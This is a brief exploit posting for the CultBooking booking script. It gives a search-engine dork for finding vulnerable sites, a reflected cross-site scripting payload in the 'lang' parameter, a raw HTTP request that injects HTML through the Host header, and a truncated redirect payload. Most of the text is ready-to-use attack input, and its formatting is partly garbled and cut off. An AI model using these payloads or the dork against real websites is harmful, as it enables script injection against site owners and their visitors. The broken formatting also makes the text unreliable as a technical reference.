Dork: "inurl:cultbooking.php" Exploit!
http://1.1.1.2/cultbooking.php?lang=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTML Injection via Header Attack: --------------------------------------------------------------------- POST http://1.1.1.2/cultbooking.php HTTP/1.1 Host: ">

ZSL-CROSS-SCRIPT-EXECUTED" Content-Length: 19 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1 Accept-Encoding: gzip,deflate Keep-Alive: 50 Connection: Keep-Alive action=cancellation --------------------------------------------------------------------- Affected Header variable: Host magic quotes bypass redirect: http://1.1.1.2/cultbooking.php?lang=">